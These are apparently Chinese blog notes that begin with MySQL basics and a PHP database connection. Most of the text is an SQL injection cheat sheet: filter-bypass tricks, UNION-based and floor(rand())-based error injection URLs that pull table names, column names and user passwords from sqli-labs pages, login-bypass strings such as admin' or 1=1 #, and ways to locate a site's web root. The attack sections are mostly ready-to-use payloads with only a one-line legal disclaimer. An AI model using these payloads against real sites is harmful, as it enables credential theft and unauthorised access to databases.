她其實並不喜歡你,只是在寂寞的時候,你剛好撞上去,剛好你對她好,剛好你能入她眼,剛好她來著不拒,這所有都是剛好。。。
---- 網易雲熱評
一、MYSQL語句
創建數據庫
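-- create the working database; `if not exists` lets these notes be re-run without an error
create database if not exists test;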
選擇要操作的數據庫
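-- select the database to work in (the original notes read `user test`, which is not a statement)
use test;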
創建表
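-- demo table used by every statement below
create table aiyou (
    id int not null,            -- no primary key is declared, so duplicate ids are accepted
    username varchar(20) not null,
    password varchar(30) not null  -- NOTE(review): stored as plain text for the demo; a real schema holds a salted hash
);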
向表中插入數據
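-- seed rows; the column list keeps the inserts valid if the table gains a column later
insert into aiyou (id, username, password) values (1, 'admin', '456');
insert into aiyou (id, username, password) values (2, 'boss', '123');
-- the original third statement repeated id 3 and had an unbalanced quote ('321''),
-- which is a syntax error; id 4 is assumed for the second row
insert into aiyou (id, username, password) values (3, 'ttt', '123'), (4, 'qqq', '321');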
顯示aiyou表中的所有記錄
-- every row of aiyou, columns named explicitly instead of `*`
select id, username, password
from aiyou;
從aiyou表中查找滿足條件id=1的記錄
-- the row (or rows, since id is not unique) with id 1
select id, username, password
from aiyou
where id = 1;
從aiyou表中查找滿足條件id=1的記錄,並只顯示username和password字段內容
-- only the username and password columns of the row with id 1
select username, password
from aiyou
where id = 1;
從aiyou表中查找同時滿足條件id=1以及username=“admin”的記錄
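-- rows matching both conditions; single quotes for the string literal,
-- because double quotes become identifier quotes when ANSI_QUOTES is enabled
select id, username, password
from aiyou
where id = 1 and username = 'admin';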
從aiyou表中查找同時滿足條件id=1或者username=“boss”的記錄
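-- rows matching either condition; single quotes for the string literal,
-- because double quotes become identifier quotes when ANSI_QUOTES is enabled
select id, username, password
from aiyou
where id = 1 or username = 'boss';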
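-- assorted administrative and information statements; the trailing notes of the original
-- were plain text after the statement, here they are proper `--` comments
drop database test;                -- drop the whole database; irreversible, removes every table in it
drop table test;                   -- drop a table (the notes name a table "test"; the demo table above is aiyou)
update aiyou set password = '111' where username = 'boss';  -- update only the rows matched by WHERE
delete from aiyou where username = 'boss';                  -- delete only the rows matched by WHERE
select load_file('c:/111.txt');    -- read a file on the server host; needs the FILE privilege and is limited by secure_file_priv
show databases;                    -- list databases visible to the current account
show tables;                       -- list the tables of the selected database
show create table aiyou\G          -- full table definition; \G is a mysql client terminator (vertical output), not SQL
describe aiyou;                    -- column definitions of a table (DESC is a synonym)
select database();                 -- currently selected database
select version();                  -- server version
select user();                     -- user name and host the client connected as
select now();                      -- current date and time
select system_user();              -- synonym for user(), not the operating-system user
select current_user();             -- account the server actually authenticated against (may differ from user())
select session_user();             -- synonym for user()
select @@datadir;                  -- data directory path
select @@basedir;                  -- mysql installation path
select @@version_compile_os;       -- operating system the server binary was built for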
二、數據庫連接
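$dbhost = 'localhost'; // mysql server host
$dbuser = 'root';      // mysql user name
$dbpass = 'root';      // mysql password
// NOTE(review): hard-coded root credentials in application code; a real application uses a
// dedicated least-privilege account and loads the secret from configuration, not from source.
$conn = mysqli_connect($dbhost, $dbuser, $dbpass);
if (!$conn) {
    // mysqli_error() takes a connection handle and there is none after a failed connect;
    // mysqli_connect_error() is the right call. The raw error is logged rather than echoed,
    // so the page does not reveal the server host, account or paths to a visitor.
    error_log('mysqli connect failed: ' . mysqli_connect_error());
    die('Could not connect');
}
echo '數據庫連接成功!';
mysqli_close($conn);
?>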
三、防注入繞過
目標:http://www.aiyou .com?id=1
1、大小寫繞過
http://www.aiyou .com?id=1 And 1=1
2、雙寫繞過
http://www.aiyou .com?id=1 aandnd 1=1
3、%00繞過
http://www.aiyou .com?id=1 a%00nd 1=1
四、手工注入
1、http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=1 返回正常
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 返回錯誤,說明存在注入
2、判斷列數
http://192.168.21.140/sqli/Less-2/index.php?id=1 order by 3 返回正常,4 返回錯誤,說明存在三列
3、聯合查詢
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,2,3 將2或3輸入我們想要查詢的內容
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,version(),database(),獲取當前數據庫及數據庫版本
4、獲取表名
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' 獲取security數據庫下的表名
5、獲取列名
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' 獲取users表下的列名
6、獲取字段內容
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(username),group_concat(password) from users
五、報錯注入
1、獲取數據庫用戶
http://192.168.21.137/sqli/Less-1/index.php?id=1' union select 1 from (select count(*),concat(floor(rand(0)*2),(select user()limit 0,1))a from information_schema.tables group by a)b --+
2、獲取數據庫名稱
http://192.168.21.137/sqli/Less-1/index.php?id=1' union select 1 from (select count(*),concat(floor(rand(0)*2),(select database()limit 0,1))a from information_schema.tables group by a)b --+
http://192.168.21.137/sqli/Less-1/index.php?id=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
3、獲取當前數據庫名稱,返回的是一個十六進制,需要還原
http://192.168.21.137/sqli/Less-1/index.php?id=1' and (select 1 from(select count(*),concat((select(select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
4、獲取表名
http://192.168.21.137/sqli/Less-1/index.php?id=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
5、獲取字段
http://192.168.21.137/sqli/Less-1/index.php?id=1'and(select 1 from(select count(*),concat((select(select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 2,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
6、獲取字段內容
http://192.168.21.137/sqli/Less-1/index.php?id=1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x7e,password,0x27,0x7e) FROM users LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
六、後臺繞過
1、admin'#
2、admin' or 1=1 #
3、'or'='or'
4、admin' or '1'='1
5、admin' #
七、獲取網站的根目錄
1、報錯顯示
2、site:目標網站 warning
3、遺留文件phpinfo
4、漏洞爆路徑
5、讀取配置文件
禁止非法,後果自負